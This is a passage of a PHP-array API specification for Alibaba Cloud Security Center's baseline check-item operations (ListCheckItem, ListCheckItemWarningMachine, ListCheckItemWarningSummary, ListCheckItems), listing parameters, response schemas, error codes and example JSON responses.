'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '9F4E6157-9600-5588-86B9-38F09067****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"CheckItems\\": [\\n {\\n \\"InstanceSubType\\": \\"INSTANCE\\",\\n \\"CheckId\\": 21,\\n \\"CheckShowName\\": \\"IPv4 Access Control\\",\\n \\"InstanceType\\": \\"API_GATEWAY\\",\\n \\"RiskLevel\\": \\"HIGH\\",\\n \\"Vendor\\": \\"0\\",\\n \\"SectionIds\\": [\\n 102\\n ],\\n \\"Description\\": {\\n \\"Type\\": \\"text\\",\\n \\"Value\\": \\"Checks whether strict access control policies are configured. Requirements: 1. If no blacklists and whitelist are configured, configure a whitelist first. 2. If a blacklist is configured, find the blacklist in the list of access control policies. We recommend that you do not configure an empty blacklist. 3. If a whitelist is configured, find the whitelist in the list of access control policies. We recommend that you do not configure an empty whitelist. Make sure that the whitelist does not contain 0.0.0.0. You can add the following IP addresses to the whitelist: ${IPList}.\\"\\n },\\n \\"CustomConfigs\\": [\\n {\\n \\"Name\\": \\"IPList\\",\\n \\"TypeDefine\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"LIST\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"range\\\\\\\\\\\\\\":[1,512],\\\\\\\\\\\\\\"listType\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"STRING\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"range\\\\\\\\\\\\\\":[0,22]}}\\",\\n \\"DefaultValue\\": \\"0\\",\\n \\"Value\\": \\"1\\",\\n \\"ShowName\\": \\"IP列表\\"\\n }\\n ],\\n \\"EstimatedCount\\": 30,\\n \\"CheckType\\": \\"SYSTEM\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 10\\n },\\n \\"RequestId\\": \\"9F4E6157-9600-5588-86B9-38F09067****\\"\\n}","type":"json"}]', 'title' => 'ListCheckItem', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckItem', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCheckItemWarningMachine' => [ 'summary' => 'Query the list of warning machines for a specific baseline check item.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the check item.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '8'], ], [ 'name' => 'RiskType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The type of the check item.'."\n", 'type' => 'string', 'required' => false, 'example' => 'cis'], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The status of the check item. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **2**: verifying'."\n" .'* **3**: passed'."\n" .'* **6**: ignored'."\n" .'* **7**: fixing'."\n" .'* **8**: fixed', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '3'], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The keyword that is used to query servers in fuzzy match mode.'."\n", 'type' => 'string', 'required' => false, 'example' => '225'], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the field that is used to query containers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'clusterId'], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The value of the field that is used to query containers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ce89cdd0ea732472a8703821b19e****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Pages start from page **1**. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~130972~~) operation to query the ID of the asset group.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1161****', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Default value: default. Valid values:'."\n" ."\n" .'* **default**: The check items of baselines for hosts.'."\n" .'* **agentless**: The check items of baselines for agentless detection.'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUID array of the servers.', 'type' => 'array', 'items' => ['description' => 'The UUID of the servers.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.', 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1082098404740323', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The servers on which the alerts are generated by page.'."\n", 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The servers on which the alerts are generated.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The server on which the alert is generated.'."\n", 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the check item. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **2**: verifying'."\n" .'* **3**: passed'."\n" .'* **6**: ignored'."\n" .'* **7**: fixing'."\n" .'* **8**: fixed', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Bind' => ['description' => 'Indicates whether Security Center is authorized to protect the asset. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'AuthVersion' => ['description' => 'The edition of Security Center that is authorized to protect the asset. Valid values:'."\n" ."\n" .'* **1**: Basic edition'."\n" .'* **6**: Anti-virus edition'."\n" .'* **5**: Advanced edition'."\n" .'* **3**: Enterprise edition'."\n" .'* **7**: Ultimate edition'."\n" .'* **10**: Value-added Plan edition'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PortOpen' => ['description' => 'Indicates whether a port on the server is accessible over the Internet. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.'."\n", 'type' => 'string', 'example' => 'i-bp1a69mvjujbakxu****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the affected asset.'."\n", 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the affected asset.'."\n", 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the asset.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Prompt' => ['description' => 'The prompt for the risk item.'."\n", 'type' => 'string', 'example' => 'There is a weak password (username/password): root/he*****34', 'title' => ''], 'WarningRiskList' => [ 'description' => 'The information about the baselines on which the risk item is detected.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details about the baseline based on which the risk item is detected.'."\n", 'type' => 'object', 'properties' => [ 'RiskId' => ['description' => 'The ID of the baseline.'."\n", 'type' => 'integer', 'format' => 'int64', 'deprecated' => true, 'example' => '72', 'title' => ''], 'RiskName' => ['description' => 'The name of the baseline.'."\n", 'type' => 'string', 'deprecated' => true, 'example' => 'Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II', 'title' => ''], ], 'title' => '', 'example' => '', ], 'deprecated' => true, 'title' => '', 'example' => '', ], 'FixList' => [ 'description' => 'The details of the baselines for which the risk item can be fixed.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details about the baseline for which the risk item can be fixed.'."\n", 'type' => 'object', 'properties' => [ 'RiskId' => ['description' => 'The ID of the baseline.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '72', 'title' => ''], 'RiskName' => ['description' => 'The name of the baseline.'."\n", 'type' => 'string', 'example' => 'Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ContainerId' => ['description' => 'The ID of the container.'."\n", 'type' => 'string', 'example' => '48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f9215570********', 'title' => ''], 'ContainerName' => ['description' => 'The name of the container.'."\n", 'type' => 'string', 'example' => 'step-build-ui-build', 'title' => ''], 'TargetName' => ['description' => 'The name of the asset on which the malicious image sample is detected.'."\n", 'type' => 'string', 'example' => 'jenkins****', 'title' => ''], 'TargetId' => ['description' => 'The ID of the asset that is scanned.'."\n", 'type' => 'string', 'example' => '30****', 'title' => ''], 'TargetType' => ['description' => 'The type of the asset. Valid values:'."\n" ."\n" .'* **ECS_SNAPSHOT**'."\n" .'* **ECS_IMAGE**'."\n", 'type' => 'string', 'example' => 'ECS_IMAGE', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp generated when the last scan was performed. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1694692471000', 'title' => ''], 'LastHandleTime' => ['description' => 'The timestamp of the latest processing of the check item risk of the machine. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1694692471000', 'title' => ''], 'FixStatus' => ['description' => 'Whether the repair is supported. Valid values:'."\n" .'* **0**: Supported'."\n" .'* **1**: Not Supported', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AssetType' => ['title' => '', 'description' => 'Type of cloud product assets', 'type' => 'string', 'example' => '0'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of affected assets.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '107', 'title' => ''], 'Count' => ['description' => 'The number of affected assets returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '22B5615F-700E-575A-A6D5-DC8D7741****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"Status\\": 1,\\n \\"Bind\\": true,\\n \\"AuthVersion\\": 3,\\n \\"PortOpen\\": true,\\n \\"InstanceId\\": \\"i-bp1a69mvjujbakxu****\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Prompt\\": \\"There is a weak password (username/password): root/he*****34\\",\\n \\"WarningRiskList\\": [\\n {\\n \\"RiskId\\": 72,\\n \\"RiskName\\": \\"Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II\\"\\n }\\n ],\\n \\"FixList\\": [\\n {\\n \\"RiskId\\": 72,\\n \\"RiskName\\": \\"Alibaba Cloud Linux/Aliyun Linux 2 Baseline for China classified protection of cybersecurity-Level II\\"\\n }\\n ],\\n \\"ContainerId\\": \\"48a6d9a92435a13ad573372c3f3c63b7e04d106458141df9f9215570********\\",\\n \\"ContainerName\\": \\"step-build-ui-build\\",\\n \\"TargetName\\": \\"jenkins****\\",\\n \\"TargetId\\": \\"30****\\",\\n \\"TargetType\\": \\"ECS_IMAGE\\",\\n \\"LastScanTime\\": 1694692471000,\\n \\"LastHandleTime\\": 1694692471000,\\n \\"FixStatus\\": 1,\\n \\"AssetType\\": \\"0\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 107,\\n \\"Count\\": 4\\n },\\n \\"RequestId\\": \\"22B5615F-700E-575A-A6D5-DC8D7741****\\"\\n}","type":"json"}]', 'title' => 'Get Warning Machines for a Specific Baseline Check Item', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItemWarningMachine'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckItemWarningMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCheckItemWarningSummary' => [ 'summary' => 'Queries the risk statistics of check items by page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '145310', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'RiskType', 'in' => 'query', 'schema' => ['description' => 'The type of the baseline.'."\n", 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'weak_password'], ], [ 'name' => 'CheckType', 'in' => 'query', 'schema' => ['description' => 'The type of the check item.'."\n", 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'hc.check.type.attack_defense'], ], [ 'name' => 'CheckWarningStatus', 'in' => 'query', 'schema' => ['description' => 'The risk status. Default value is null, meaning check items in all states are queried. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **3**: passed'."\n" .'* **6**: whitelisted'."\n" .'* **8**: fixed', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'required' => false, 'example' => '3'], ], [ 'name' => 'CheckLevel', 'in' => 'query', 'schema' => ['description' => 'The risk level. Default value: null, which indicates that check items at all risk levels are queried.Valid values:'."\n" .'* **high**'."\n" .'* **medium**'."\n" .'* **low**', 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'medium'], ], [ 'name' => 'CheckItemFuzzy', 'in' => 'query', 'schema' => ['description' => 'The name of the check item. Fuzzy match is supported.'."\n", 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'password'], ], [ 'name' => 'ContainerFieldName', 'in' => 'query', 'schema' => ['description' => 'The name of the field that is used to query containers.'."\n", 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'clusterId'], ], [ 'name' => 'ContainerFieldValue', 'in' => 'query', 'schema' => ['description' => 'The value of the field that is used to query containers.'."\n", 'type' => 'string', 'title' => '', 'required' => false, 'example' => 'c471f0f61b9c04f8380556e922cf1****'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: 20. If you leave this parameter empty, 20 entries are returned on each page.'."\n" ."\n" .'> We recommend that you do not leave this parameter empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the IDs of asset groups.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1161****', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The data source. Default value: **default**. Valid value:'."\n" ."\n" .'* **agentless**: The check items of baselines for agentless detection.'."\n" .'* **default**: The check items of baselines for hosts.'."\n", 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUIDs of the servers.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'CheckWarningStatusList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of risk levels. If the CheckWarningStatus parameter is specified, only it takes effect.'."\n", 'type' => 'array', 'items' => ['description' => 'The risk status. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **3**: passed'."\n" .'* **6**: whitelisted'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'Start of time range for filtering alerts, effective only for querying historically handled alerts.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1732793158366', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['description' => 'The Alibaba Cloud account ID of the member in the resource directory.'."\n" ."\n" .'> You can call the [DescribeMonitorAccounts](~~DescribeMonitorAccounts~~) operation to obtain the IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1232428423234****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'List of check item risk statistics.'."\n", 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'List of check item risk statistics.'."\n", 'type' => 'array', 'items' => [ 'description' => 'Risk statistic of check items.'."\n", 'type' => 'object', 'properties' => [ 'RiskType' => ['description' => 'The type of the baseline.'."\n", 'type' => 'string', 'deprecated' => true, 'title' => '', 'example' => 'weak_password'], 'Alias' => ['description' => 'The alias of the baseline type.'."\n", 'type' => 'string', 'deprecated' => true, 'title' => '', 'example' => 'week_pa****'], 'CheckId' => ['description' => 'The ID of the check item.'."\n", 'type' => 'integer', 'format' => 'int64', 'title' => '', 'example' => '696'], 'CheckItem' => ['description' => 'The description of the check item.'."\n", 'type' => 'string', 'title' => '', 'example' => 'Config the Event Audit policys'], 'CheckLevel' => ['description' => 'The risk level of the check item. Valid values:'."\n" ."\n" .'* **high**'."\n" .'* **medium**'."\n" .'* **low**'."\n", 'type' => 'string', 'title' => '', 'example' => 'high'], 'CheckType' => ['description' => 'The type of the check item.'."\n", 'type' => 'string', 'title' => '', 'example' => 'Security audit'], 'Advice' => ['description' => 'The suggestion on the check item.'."\n", 'type' => 'string', 'title' => '', 'example' => 'In the Administrative Tools window, double-click Local Security Policy. In the Local Security Policy window that appears, choose Security Settings\\\\Local Policies\\\\Audit Policy, configure all audit policies as: `Success, Failure`.'], 'Description' => ['description' => 'The description of the check item.'."\n", 'type' => 'string', 'title' => '', 'example' => 'Config the Event Audit policys'], 'Status' => ['description' => 'Risk status of check items. Valid values:'."\n" ."\n" .'* **1**: failed'."\n" .'* **3**: passed'."\n" .'* **6**: whitelisted'."\n" .'* **8**: fixed', 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '1'], 'WarningMachineCount' => ['description' => 'The number of servers that are affected by the check item.'."\n", 'type' => 'integer', 'format' => 'int32', 'title' => '', 'example' => '20'], 'ContainerCheckItem' => ['description' => 'Indicates whether the check item belongs to the container runtime type. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'AffiliatedRiskTypes' => [ 'description' => 'The types of the baselines to which the check item belongs.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the baseline to which the check item belongs.'."\n", 'type' => 'string', 'example' => 'CIS Compliance checks', 'title' => ''], 'title' => '', 'example' => '', ], 'AffiliatedRisks' => [ 'description' => 'The baselines to which the check item belongs.'."\n", 'type' => 'array', 'items' => ['description' => 'The baseline to which the check item belongs.'."\n", 'type' => 'string', 'example' => 'CIS Ubuntu Linux 14 LTS Benchmark', 'title' => ''], 'title' => '', 'example' => '', ], 'EnableRisks' => [ 'description' => 'The baselines in which the check item is enabled.'."\n", 'type' => 'array', 'items' => ['description' => 'The baseline in which the check item is enabled.'."\n", 'type' => 'string', 'example' => 'CIS Ubuntu Linux 14 LTS Benchmark'."\n", 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '4', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'DC97C9EC-4B7D-5EFF-8A5E-A5CCC9ED****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"RiskType\\": \\"weak_password\\",\\n \\"Alias\\": \\"week_pa****\\",\\n \\"CheckId\\": 696,\\n \\"CheckItem\\": \\"Config the Event Audit policys\\",\\n \\"CheckLevel\\": \\"high\\",\\n \\"CheckType\\": \\"Security audit\\",\\n \\"Advice\\": \\"In the Administrative Tools window, double-click Local Security Policy. In the Local Security Policy window that appears, choose Security Settings\\\\\\\\\\\\\\\\Local Policies\\\\\\\\\\\\\\\\Audit Policy, configure all audit policies as: `Success, Failure`.\\",\\n \\"Description\\": \\"Config the Event Audit policys\\",\\n \\"Status\\": 1,\\n \\"WarningMachineCount\\": 20,\\n \\"ContainerCheckItem\\": true,\\n \\"AffiliatedRiskTypes\\": [\\n \\"CIS Compliance checks\\"\\n ],\\n \\"AffiliatedRisks\\": [\\n \\"CIS Ubuntu Linux 14 LTS Benchmark\\"\\n ],\\n \\"EnableRisks\\": [\\n \\"CIS Ubuntu Linux 14 LTS Benchmark\\\\n\\"\\n ]\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 4\\n },\\n \\"RequestId\\": \\"DC97C9EC-4B7D-5EFF-8A5E-A5CCC9ED****\\"\\n}","type":"json"}]', 'title' => 'ListCheckItemWarningSummary', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListCheckItemWarningSummary'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListCheckItemWarningSummary', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListCheckItems' => [ 'summary' => 'List custom check items for situational awareness', 'path' => '', 'methods' => ['get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'CheckId', 'in' => 'query', 'schema' => ['description' => 'The ID of the check item.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '100000000001', 'title' => ''], ], [ 'name' => 'CheckShowName', 'in' => 'query', 'schema' => ['description' => 'The name of the custom check item.', 'type' => 'string', 'required' => false, 'example' => 'testCheckItemName', 'title' => ''], ], [ 'name' => 'CheckTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The source type of the situational awareness check item.', 'type' => 'array', 'items' => ['description' => 'The type of the check item (identifies whether the policy is a system check item or a user check item):'."\n" ."\n" .'- **CUSTOM**: User-defined'."\n" ."\n" .'- **SYSTEM**: System-defined', 'type' => 'string', 'required' => false, 'example' => 'SYSTEM', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. The default value is **zh**. Values:'."\n" ."\n" .'- **zh**: Chinese'."\n" ."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Statuses', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The status of the check item.', 'type' => 'array', 'items' => ['description' => 'The status of the check item. Values:'."\n" ."\n" .'- **EDIT**: In editing'."\n" ."\n" .'- **RELEASE**: Released', 'type' => 'string', 'required' => false, 'example' => 'RELEASE', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Specifies the maximum number of data entries to display per page when performing a paginated query. The default number of data entries displayed per page is 20, and if the PageSize parameter is empty, it will default to returning 20 data entries.'."\n" ."\n" .'> It is 